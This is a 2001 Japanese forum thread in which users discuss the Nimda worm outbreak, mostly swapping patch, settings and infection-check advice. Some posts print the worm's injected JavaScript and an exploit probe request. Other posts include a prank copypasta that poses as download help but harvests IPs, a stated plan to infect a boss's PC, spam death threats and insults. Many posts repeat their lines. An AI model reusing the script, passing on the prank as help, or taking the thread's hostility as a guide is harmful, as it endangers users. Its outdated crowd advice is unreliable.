351 :ん〜ま:01/09/19 22:33 ID:TWLvHZ.k
うーむ。1晩で大事になってる。。。
352 :名無しの介:01/09/19 22:33 ID:TvdYEyVY
クソピーはあんだけ見た目変えまくったら
きっと中身はバグだらけに違いない。
クソピー自体がウイルスだったりして。
きっと中身はバグだらけに違いない。
クソピー自体がウイルスだったりして。
353 :343:01/09/19 22:37 ID:k3oIsIQw
354 : :01/09/19 22:39 ID:fo/1e8dI
明日、次長のパソにコソーリニムダ入れるニダ・・・
355 :347:01/09/19 22:44 ID:kXOWfYUg
356 : :01/09/19 22:46 ID:yAHnr2Qo
うちにこんなものが・・・
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
誰だよ。
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
誰だよ。
358 : :01/09/19 22:52 ID:XTAHDm5.
359 : :01/09/19 22:52 ID:kXOWfYUg
360 : :01/09/19 22:53 ID:JKOzZn5M
2ちゃんねる見ただけで感染するウィルスきぼーーん。(;´Д‘)ハァハァ
362 : :01/09/19 22:55 ID:KpBT27lU
364 :ななし:01/09/19 22:59 ID:mhpTSQ7.
ニュース見てたけど、官庁関係(地方も)けっこうやられてるね。
365 : :01/09/19 22:59 ID:hZqTtZgE
つーか、放置してもOK?
367 : :01/09/19 23:00 ID:UKoXFWhc
ブロードバンドスピードテスト←javaスクリプトON
↓
ワーイ!今までで一番速いーー!
↓
そのまま他のサイトへGO!
↓
感染
↓
(゜Д゜)マズー
プロパ板にいそうだ。
↓
ワーイ!今までで一番速いーー!
↓
そのまま他のサイトへGO!
↓
感染
↓
(゜Д゜)マズー
プロパ板にいそうだ。
368 :名無しさん:01/09/19 23:01 ID:lVEmuQHY
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。
ダウンロードの方法は
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
。
うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!何度もトライ!
http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
ただし特殊なソフトにつき普通にリンクを張ることはできません。
ダウンロードの方法は
1.書き込みの名前の欄に http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
。
うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!何度もトライ!
http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
369 : :01/09/19 23:03 ID:ALUfLgrg
世界最大のサイバーテロ(w>ニューステ
370 : :01/09/19 23:03 ID:uuoG2bM2
371 :名無しメンバー@操縦マニュアル ◆YXXYvFUU :01/09/19 23:04 ID:H0tiBHFE
おれも見た。記念カキーーーーコ
373 :ふしあな3:01/09/19 23:06 ID:E5mJ8fc2
368の言うとおりにしたらIP抜かれるヨ(w
374 :http://kusoanasan.2ch.net/:01/09/19 23:09 ID:jlsgzb6Q
>>368 逝ってよし
375 : :01/09/19 23:12 ID:exuvAMjI
CPUをまもるん?
376 :.:01/09/19 23:16 ID:WHtEQBvI
>375
こぴぺに突っ込んじゃダメよ
こぴぺに突っ込んじゃダメよ
377 :名無し:01/09/19 23:17 ID:s6wPAmQY
IEのSP1はあるけど2はどこにあるの?
379 : :01/09/19 23:21 ID:g0s0z5vI
380 : :01/09/19 23:24 ID:LRM32VyM
いま日テレでちょこっとだけ、nimdaの話してたぞ
381 : :01/09/19 23:28 ID:Zjo.IShU
Internet Explorer 5.01 Service Pack 2
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
382 : :01/09/19 23:29 ID:9Lkla2bI
NHK
383 : :01/09/19 23:32 ID:7TEWd3J.
昨日の今ぐらいの時間にMSNに行ったんだけど感染してなかった。
SP2じゃないのに何でだろ?
SP2じゃないのに何でだろ?
384 :210.136.35.56:01/09/19 23:33 ID:.5zEs4/Q
え、最近のウィルスってCPUにまで影響するんだ?
すごいdeathね
すごいdeathね
385 : :01/09/19 23:34 ID:RlLnfulw
「ニムダ」ってあの国の単語だよね。
何て意味なの?
何て意味なの?
386 :これだ!!:01/09/19 23:34 ID:4cfdEP4M
387 :名無しさん:01/09/19 23:34 ID:t5ePDc5w
388 : :01/09/19 23:34 ID:/bRcy0UM
JavaScript無効だと平気なの?
389 :パート1の214:01/09/19 23:36 ID:AF/I6TVI
パート3までいったのね。
あいかわらず、メール来てない。。
あいかわらず、メール来てない。。
390 : :01/09/19 23:36 ID:gSG9bUGY
JavaScript無効ってどうやってやるの?
391 :aa:01/09/19 23:37 ID:u8AJEl0w
日テレで感染した状態の映像やってたぞ。
怖えーーーー
怖えーーーー
392 :食通じじい:01/09/19 23:37 ID:XpBPEPsA
393 : :01/09/19 23:38 ID:9Lkla2bI
394 : :01/09/19 23:38 ID:75aQuCX2
>>383
感染していたのはMSNのリダイレクト用サーバー
http://www.jp.msn.comという情報があるので、
もしかしたらhttp://www.msn.co.jpに直接
行ってたんじゃありません?(ブックマークとかで)
感染していたのはMSNのリダイレクト用サーバー
http://www.jp.msn.comという情報があるので、
もしかしたらhttp://www.msn.co.jpに直接
行ってたんじゃありません?(ブックマークとかで)
395 :ぺ ◆lPYiMAEY :01/09/19 23:38 ID:Q.NJAFY.
とりあえず過去ログ読め
ヘルプ読め
と言いたい今日1日だった。
最後に言ってしまった・・・
ヘルプ読め
と言いたい今日1日だった。
最後に言ってしまった・・・
396 :11歳 飼育係:01/09/19 23:39 ID:/dcifEjY
397 : :01/09/19 23:41 ID:vB39mc5.
msnまた落ちちゃったみたいだね。
ニュース見てみんな見にいちゃったからか?
ニュース見てみんな見にいちゃったからか?
398 :?:01/09/19 23:42 ID:kkCj2/R.
IE6.0に上げたばっかりだけど、これは大丈夫なの?
399 : :01/09/19 23:42 ID:PnOQ0zhc
アンニョンハセヨ-!
メァニフェクチアオンダグドマネー
メァニフェクチアオンダグドマネー
400 : :01/09/19 23:42 ID:kXOWfYUg
401 : :01/09/19 23:43 ID:7TEWd3J.
402 : :01/09/19 23:45 ID:ALUfLgrg
tbs
403 :気がつけばウイルス?:01/09/19 23:46 ID:bZ2tEd4s
身内の見舞いに忙しくて、病院で看病してまる2日。
気がつけば、、ニュースでのウイルス騒ぎはかなり
ヤバかったんですねー。
一応オイラのパソにはワクチンあるからいいけど・・・・大丈夫かな?
ちょっと過去ログで確認する元気が無い。
とりあえず「伝染ってませんよーに」と、祈るよ。ナムナムー
気がつけば、、ニュースでのウイルス騒ぎはかなり
ヤバかったんですねー。
一応オイラのパソにはワクチンあるからいいけど・・・・大丈夫かな?
ちょっと過去ログで確認する元気が無い。
とりあえず「伝染ってませんよーに」と、祈るよ。ナムナムー
404 : :01/09/19 23:47 ID:aYQnyH8c
初心者の質問です。IE5.00を使っていますがこれは安心できるのでしょうか?
405 : :01/09/19 23:48 ID:hZqTtZgE
おまえら、イスラム過激派なめんなよ!!
コーラン破いたやつの味方する日本人全員死刑宣告
コーラン破いたやつの味方する日本人全員死刑宣告
コーラン破いたやつの味方する日本人全員死刑宣告
コーラン破いたやつの味方する日本人全員死刑宣告
コーラン破いたやつの味方する日本人全員死刑宣告
コーラン破いたやつの味方する日本人全員死刑宣告
407 :定期コピペ:01/09/19 23:49 ID:LNEMDmj.
状況報告ver1.06(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
ダウンロードの不許可は保険の保険なので、必要ない人には必要なし。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
LANによる感染
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
LANの共有フォルダを使っても自己増殖する。
感染鯖
ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
ダウンロードの不許可は保険の保険なので、必要ない人には必要なし。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
LANによる感染
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
LANの共有フォルダを使っても自己増殖する。
感染鯖
ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
408 : :01/09/19 23:49 ID:75aQuCX2
>>400
それなら、383さんが感染、というかreadme.emlを
飼っててもおかしくないですな。Jscript切ってたか、
そのあたりの可能性が。
>>401
実際そのころのHotmailサーバに関して情報を知らないので
よく判りませんが、とりあえずトレンドマイクロで
オンラインウィルススキャンかけるのが吉かと。
それなら、383さんが感染、というかreadme.emlを
飼っててもおかしくないですな。Jscript切ってたか、
そのあたりの可能性が。
>>401
実際そのころのHotmailサーバに関して情報を知らないので
よく判りませんが、とりあえずトレンドマイクロで
オンラインウィルススキャンかけるのが吉かと。
409 : :01/09/19 23:50 ID:186vJgXg
410 :定期コピペ2:01/09/19 23:50 ID:LNEMDmj.
状況報告ver1.06(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
411 : :01/09/19 23:54 ID:PnOQ0zhc
Jフォンもサービス障害
あら写メールが送れないわ
あら写メールが送れないわ
412 : :01/09/19 23:54 ID:9Lkla2bI
413 :祈っても直らないだろうし:01/09/19 23:55 ID:bZ2tEd4s
414 :1の214:01/09/19 23:58 ID:s8kLquPA
なんで、昨日のあの時間帯に行ったのに、感染ってないの?
パソコンまっさらなんだけどな。
無菌室でそだったようなパソコンなのに・・
うつらないにこしたことないけど、
おいらも騒ぎた〜いのだ!!
でも、まあヨカタか。。
パソコンまっさらなんだけどな。
無菌室でそだったようなパソコンなのに・・
うつらないにこしたことないけど、
おいらも騒ぎた〜いのだ!!
でも、まあヨカタか。。
415 :厨房:01/09/20 00:00 ID:7O6hrMTA
半角板で鍛えられる俺は、強いぜ!!
416 : :01/09/20 00:05 ID:PnludxvA
各板のトップに注意書きがあるのはいいが、なんだよ「インターネット
エクスプローラーSP2」てのは、バージョン数字ちゃんと書かないと
全然意味が通じないだろうが。
エクスプローラーSP2」てのは、バージョン数字ちゃんと書かないと
全然意味が通じないだろうが。
417 : :01/09/20 00:07 ID:1AIy1w9k
厨房って優れた人達だつたのですね。
これからは尊敬させてもらいます。
これからは尊敬させてもらいます。
418 : :01/09/20 00:07 ID:N5gVhJ66
ネスケはどうなの?
教えて君でスマソ。
教えて君でスマソ。
419 : :01/09/20 00:09 ID:a0DxZVaM
420 :*:01/09/20 00:09 ID:bcU1ju3I
421 : :01/09/20 00:10 ID:1DkKZwAs
IE6ですがなにか?
大学生がわざと学校のPCをウイルスに感染させやがった!
ブチ殺す!
てめーのせいで、こちとら残業してんだぞゴラァ
カス!ボケ!死ね!ちんこ野郎!
失礼しました
ブチ殺す!
てめーのせいで、こちとら残業してんだぞゴラァ
カス!ボケ!死ね!ちんこ野郎!
失礼しました
423 : :01/09/20 00:14 ID:uqFvKzxU
IE5.0は安心?
424 : :01/09/20 00:16 ID:H.FOaltM
425 :1の214:01/09/20 00:16 ID:a0DxZVaM
あのさ〜感染ると、イパイ、メール送られてくるんだよね。
やたら、重いのは、ウイルスの生じゃなくて、
日本中で、あわててるからですか?
しかし、なんで感染ってないんだろ。。いいんだけどさ。。(フシギ
やたら、重いのは、ウイルスの生じゃなくて、
日本中で、あわててるからですか?
しかし、なんで感染ってないんだろ。。いいんだけどさ。。(フシギ
426 :名無しさん:01/09/20 00:17 ID:AmLquBTE
427 : :01/09/20 00:17 ID:hZ8hbhVs
すでにIE6を入れてあったんですが
MoonBrowserを常用しています。
これだと件のウィルスに感染の危険はあるんでしょうか?
MoonBrowserを常用しています。
これだと件のウィルスに感染の危険はあるんでしょうか?
428 : :01/09/20 00:17 ID:BfJhmvoI
429 :名無しさん:01/09/20 00:19 ID:AmLquBTE
430 : :01/09/20 00:20 ID:3RjHGm5M
432 :名無し:01/09/20 00:21 ID:uzIMihZo
さっきHotmail見にいったんですけど、大丈夫なんでしょうか?
初心者でスマソ。
ちなみにWin98でIE5.5SP2です。
初心者でスマソ。
ちなみにWin98でIE5.5SP2です。
433 :ご愁傷さま:01/09/20 00:21 ID:RNKWd17s
しかし、毎回毎回クソMicroSoftのウィルス絡みの事件聞くたびに
思うんだけど、なんでみんなIE使ってんの?
会社でPC全滅状態で俺のは平気だったよ
思うんだけど、なんでみんなIE使ってんの?
会社でPC全滅状態で俺のは平気だったよ
434 : ◆Ucjzcv2I :01/09/20 00:22 ID:ExgledFw
435 :名無しさん:01/09/20 00:22 ID:AmLquBTE
437 : :01/09/20 00:24 ID:MNcG1Ck6
readme[1].emlってファイルが1個だけみっかったんだけど、
HIT?
時間が0:17になってたから、そんときHP見てたからそこでもらったのかな?
アドレスはhttp://www.ieaj.co.jp/plutonium/
HIT?
時間が0:17になってたから、そんときHP見てたからそこでもらったのかな?
アドレスはhttp://www.ieaj.co.jp/plutonium/
438 :1の214:01/09/20 00:25 ID:a0DxZVaM
439 : :01/09/20 00:25 ID:VuvnRPE2
5.00のSP2なら大丈夫?
440 : :01/09/20 00:25 ID:wBnMalmU
ディスク領域が足りなくて
バージョンアップできない…。
一応Javaとか全部切ってるけど、
Hotmailのメールチェックしたい…。
今Hotmailって使えるんですか?ログインするサイトいったら感染します?
超初心者ですいません。
バージョンアップできない…。
一応Javaとか全部切ってるけど、
Hotmailのメールチェックしたい…。
今Hotmailって使えるんですか?ログインするサイトいったら感染します?
超初心者ですいません。
441 : :01/09/20 00:26 ID:3RjHGm5M
442 : :01/09/20 00:26 ID:H.FOaltM
443 : :01/09/20 00:27 ID:XM910jY.
Microsoftの説明には5.01、5.01(SP1)、5.5、5.5(SP1)以外のブラウザは
大丈夫って書いてあるから5.00は安全ってことですか?
http://help.msn.co.jp/notice.htm
大丈夫って書いてあるから5.00は安全ってことですか?
http://help.msn.co.jp/notice.htm
444 : :01/09/20 00:27 ID:H.FOaltM
445 : :01/09/20 00:27 ID:RSa41sHg
>さっきHotmail見にいったんですけど、大丈夫なんでしょうか?
>初心者でスマソ。
さすがにこの手のレス見飽きたぞ!
書き込む前にきちんとログを読みましょう。
>初心者でスマソ。
さすがにこの手のレス見飽きたぞ!
書き込む前にきちんとログを読みましょう。
446 :ご愁傷さま:01/09/20 00:28 ID:RNKWd17s
447 : :01/09/20 00:28 ID:MNcG1Ck6
448 :IE5.0:01/09/20 00:28 ID:hvgVX.Fk
あのさ、アップデートできなくて(回線が途中で切れる?)
過去ログ見回したけどイマイチよくわかんないから、この際
ワクチンできるまで2chしか見ないようにしようと思うんだけど…
こんなヘタレな対応でもOKかな?
で、ワクチンできたら、感染されたサイトも安全に見れるように
なるのでしょうか?
過去ログ見回したけどイマイチよくわかんないから、この際
ワクチンできるまで2chしか見ないようにしようと思うんだけど…
こんなヘタレな対応でもOKかな?
で、ワクチンできたら、感染されたサイトも安全に見れるように
なるのでしょうか?
449 :名無しさん:01/09/20 00:29 ID:AmLquBTE
450 : :01/09/20 00:30 ID:WCBYNNhY
>>437
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
があった
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
があった
451 :にゃごにゃご ◆SiztG/RU :01/09/20 00:30 ID:RaDALfHY
452 : :01/09/20 00:30 ID:H.FOaltM
453 : :01/09/20 00:31 ID:aSKsFDUM
454 :ぺ ◆lPYiMAEY :01/09/20 00:31 ID:/hTtAWMo
VB2001最新版が出てるよ〜〜
パターン942
ニムダ関連かどうか分からないけど、とりあえず報告しときます。
(初心者スレにも書いたのでマルチポストだけど許して)
455 : :01/09/20 00:31 ID:MNcG1Ck6
456 :440:01/09/20 00:32 ID:wBnMalmU
457 :455:01/09/20 00:33 ID:MNcG1Ck6
readme[1]のファイルサイズが増えた−。
やっぱ幹線かな?
やっぱ幹線かな?
458 : :01/09/20 00:34 ID:0KH7i9iE
それより、J-COM@相模原のメルサバが死んでんだよ!
J-COMのひと、いない?
J-COMのひと、いない?
459 : :01/09/20 00:34 ID:XdKiHEtA
460 :にゃごにゃご ◆SiztG/RU :01/09/20 00:34 ID:RaDALfHY
>>455
感染すると、.eml という拡張子が数百から千に増殖するみたい。
それがなくて、テンポラリーフォルダに入ってるひとつだけなら
削除すればいいんじゃないかな。でも、ウィルスソフト入れた
ほうがいいです。私もここのログ読んだだけだから、これ以上は
わからないんです。
感染すると、.eml という拡張子が数百から千に増殖するみたい。
それがなくて、テンポラリーフォルダに入ってるひとつだけなら
削除すればいいんじゃないかな。でも、ウィルスソフト入れた
ほうがいいです。私もここのログ読んだだけだから、これ以上は
わからないんです。
461 :ぶご:01/09/20 00:36 ID:XJBxZpB2
マックでネスケ使えばいいんじゃない?
462 : :01/09/20 00:36 ID:FZzxJf1w
結局如何すれば見るだけ感染を防げるの?
親切な人教えてIE5.0です。
親切な人教えてIE5.0です。
463 :ご愁傷さま:01/09/20 00:37 ID:RNKWd17s
464 : :01/09/20 00:37 ID:ugxVxAjA
いやです むりです
エリマトーデス
エリマトーデス
465 :名無しさん:01/09/20 00:37 ID:AmLquBTE
466 :455:01/09/20 00:38 ID:MNcG1Ck6
>>460
ありがとうございます。
早速削除してみました。
ウィルスバスターも先ほどインストールしたのですが、
パターンファイルのインストールがアクセスが集中しているようでなかなか進みません。
感染していないといいんだけど。
ありがとうございます。
早速削除してみました。
ウィルスバスターも先ほどインストールしたのですが、
パターンファイルのインストールがアクセスが集中しているようでなかなか進みません。
感染していないといいんだけど。
467 : :01/09/20 00:39 ID:XdKiHEtA
468 : :01/09/20 00:40 ID:ugxVxAjA
469 : :01/09/20 00:41 ID:LIWuY/vI
オレ今しこしこIE5.5SP2の標準コンポーネントを
アップロードしてるんだけど
みんな標準コンポーネントをダウンロードしたの?
それともIEとOEだけ??
アップロードしてるんだけど
みんな標準コンポーネントをダウンロードしたの?
それともIEとOEだけ??
470 : :01/09/20 00:41 ID:aKPL38QI
調子に乗って、いろんな感染サイト見回ってたのだが、
ノートン先生に診てもらったところ、
Temporary Internet Filesに20個もハケーンヽ(´ー`)ノ
ノートン先生に診てもらったところ、
Temporary Internet Filesに20個もハケーンヽ(´ー`)ノ
471 : :01/09/20 00:42 ID:MNcG1Ck6
472 : :01/09/20 00:43 ID:p7osMT46
>471
初心者と言う前にログを嫁よ、、、
初心者と言う前にログを嫁よ、、、
473 :462:01/09/20 00:44 ID:FZzxJf1w
474 : :01/09/20 00:44 ID:hZ8hbhVs
トクトクの俺のサイト大丈夫だろうか・・・
475 :*:01/09/20 00:45 ID:bcU1ju3I
476 :初心者:01/09/20 00:45 ID:y5oUrefs
漏れのPCは古くてはIEの4.0なんだけど、
やっぱり感染しちゃってるのかな・・・・・
やっぱり感染しちゃってるのかな・・・・・
477 : :01/09/20 00:46 ID:LIWuY/vI
478 : :01/09/20 00:46 ID:RSa41sHg
479 :あれれ…:01/09/20 00:46 ID:XozGzvmw
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
からIE5.0をIE5.01-SP2にしようとアップデートしたのですが、
表示が「バージョン:5.00.3314.2101」のままで
更新バージョンが「SP2」に…これでいいのでしょうか?
私のOSが95なのがいけないのかなぁ…?
からIE5.0をIE5.01-SP2にしようとアップデートしたのですが、
表示が「バージョン:5.00.3314.2101」のままで
更新バージョンが「SP2」に…これでいいのでしょうか?
私のOSが95なのがいけないのかなぁ…?
480 :450:01/09/20 00:47 ID:WCBYNNhY
takara-univ.ac.jp ってところ、感染しているみたいなんだけど、
連絡入れた方が良いのかなぁ・・・
連絡入れた方が良いのかなぁ・・・
482 :s:01/09/20 00:47 ID:KRaOjPiE
感染の症状はどうなの??
483 : :01/09/20 00:48 ID:hZ8hbhVs
484 : :01/09/20 00:48 ID:MNcG1Ck6
485 : :01/09/20 00:49 ID:p7osMT46
>479
問題なし。
問題なし。
486 : :01/09/20 00:49 ID:17exxtiA
487 :479:01/09/20 00:51 ID:XozGzvmw
485さん、486さんありがとうございました。
ほっとしました…。
ほっとしました…。
488 :一応貼っとく:01/09/20 00:52 ID:p7osMT46
初心者名乗るログ読まない方へ
こちらもどうぞ
スーパー初心者のためのMSNウイルスすれ。2
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
こちらもどうぞ
スーパー初心者のためのMSNウイルスすれ。2
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
MSNのページにnimdaの事、まったく載ってない…
490 : :01/09/20 00:52 ID:yNY26JNI
MSNは黙殺する模様
491 : :01/09/20 00:54 ID:MNcG1Ck6
492 :にゃごにゃご ◆SiztG/RU :01/09/20 00:55 ID:RaDALfHY
http://help.msn.co.jp/notice.htm
ここに一応、MSNのお詫びがあるよ、、、前スレでがいしゅつだけど。
ここに一応、MSNのお詫びがあるよ、、、前スレでがいしゅつだけど。
493 :s:01/09/20 00:55 ID:fSey1M6I
490
あたりまえ。天下のMSNが感染したとあっては、信用なくなるからな。
アップグレードも提供してくれるし、MSN様サマというわけだ。
アップグレードでラジオステーションのサイトもお気に入りに登録されるし、
素晴らしいことではないか、。
あたりまえ。天下のMSNが感染したとあっては、信用なくなるからな。
アップグレードも提供してくれるし、MSN様サマというわけだ。
アップグレードでラジオステーションのサイトもお気に入りに登録されるし、
素晴らしいことではないか、。
494 : :01/09/20 00:56 ID:H66BsFco
WEBを見るだけで感染するウイルスと書いてるけど、その
WEBサイトはどこなの? その管理人がばらまいてるって
ことなのかな?
WEBサイトはどこなの? その管理人がばらまいてるって
ことなのかな?
495 :初心者:01/09/20 00:58 ID:y5oUrefs
過去ログちゃんと読んでないで申し訳ないです。
>■コピペに追加
>ふだんからJavaScriptは切っておくクセをつけるべし。
>ついでにActiveXも切っておくことも忘れずに(今回の件には関係ないと思われ?るが)
>設定の変更は「ツール(T)」から「インターネットオプション」で「セキュリティ」の
>「レベルのカスタマイズ」にて行う。
ってあるけどJavaがバグって動かないんだけど・・・・
Javaが機能しないなら大丈夫なんだろうか?
>■コピペに追加
>ふだんからJavaScriptは切っておくクセをつけるべし。
>ついでにActiveXも切っておくことも忘れずに(今回の件には関係ないと思われ?るが)
>設定の変更は「ツール(T)」から「インターネットオプション」で「セキュリティ」の
>「レベルのカスタマイズ」にて行う。
ってあるけどJavaがバグって動かないんだけど・・・・
Javaが機能しないなら大丈夫なんだろうか?
496 :困ってる人。:01/09/20 00:59 ID:v3./JepU
スマンがどうしたらいいのか良くわからん。
とりあえずsp1用のバッチを当てたら
「必要ありません」と出た。
オイラのIE5.5はsp2だったのかな。
バージョンいくつまでヤバイのか知りたい。
オイラのは5.50.4134......なのだが。
詳しい方すまないが教えてください。
とりあえずsp1用のバッチを当てたら
「必要ありません」と出た。
オイラのIE5.5はsp2だったのかな。
バージョンいくつまでヤバイのか知りたい。
オイラのは5.50.4134......なのだが。
詳しい方すまないが教えてください。
497 :.:01/09/20 01:00 ID:DJRijbDo
498 :1の214:01/09/20 01:00 ID:a0DxZVaM
500 : :01/09/20 01:02 ID:p7osMT46
>496
ヘルプ→バージョン情報→更新バージョン:;SP2;
なら問題なし。
ヘルプ→バージョン情報→更新バージョン:;SP2;
なら問題なし。
501 :@@:01/09/20 01:02 ID:fSey1M6I
職業、まんまネットサーファーだから、もう感染しとるな・・・・。
昨日の深夜にMSがウィルスに対処してなかったら、会社のPCが危険だ。
MSNには死ぬほどアクセスしてたしな(笑)。
問題があるとしたら、家のPCだ。で、実際どんな被害があるのだろう?
昨日の深夜にMSがウィルスに対処してなかったら、会社のPCが危険だ。
MSNには死ぬほどアクセスしてたしな(笑)。
問題があるとしたら、家のPCだ。で、実際どんな被害があるのだろう?
htmlメール見ただけでも感染するらしいけど、アウトルックで、HTMLメール拒否できましたか?
503 : :01/09/20 01:06 ID:bY.R8coc
昨日ネットが重いなあと思ったけど、このせいなの?
504 :困ってる人:01/09/20 01:06 ID:v3./JepU
505 : :01/09/20 01:08 ID:1sGIUVww
JavaScriptをJavaと書くな
初心者とやらがよけい混乱する
初心者とやらがよけい混乱する
506 : :01/09/20 01:08 ID:uYTGpsvA
507 : :01/09/20 01:08 ID:jicT2YMk
508 : :01/09/20 01:09 ID:3RjHGm5M
509 :困ってる人:01/09/20 01:09 ID:v3./JepU
こりゃ食らってるかのせいもあるのね。
レジストリのキーとかの情報あるところのURL欲しい。
過去ログにあるのかな。
まず、感染確定を調べるファイル名とかも希望。
おうちゃくスマンです。
かなりあせってますです。
レジストリのキーとかの情報あるところのURL欲しい。
過去ログにあるのかな。
まず、感染確定を調べるファイル名とかも希望。
おうちゃくスマンです。
かなりあせってますです。
510 :にゃごにゃご ◆SiztG/RU :01/09/20 01:10 ID:RaDALfHY
511 :ななし:01/09/20 01:11 ID:uMVG829M
512 :にゃごにゃご ◆SiztG/RU :01/09/20 01:11 ID:RaDALfHY
513 : :01/09/20 01:12 ID:H.FOaltM
514 : :01/09/20 01:12 ID:aRjjl4Vo
515 :困ってる人:01/09/20 01:13 ID:v3./JepU
516 :素人:01/09/20 01:13 ID:NFkbBq/E
で、ところで、だれがなんの目的で?こんな大騒ぎになってるの?
ウィルスソフト作ってるメーカーが、わざとやってるの?
ウィルスなんて作ってなんの儲けがあるの?はぁ〜。
(目的もなにもあったもんじゃないだろうけど)
ウィルスソフト作ってるメーカーが、わざとやってるの?
ウィルスなんて作ってなんの儲けがあるの?はぁ〜。
(目的もなにもあったもんじゃないだろうけど)
517 : :01/09/20 01:14 ID:wuTsXjoQ
おいらのIE6、更新バージョン;0。
あたりまえか^^
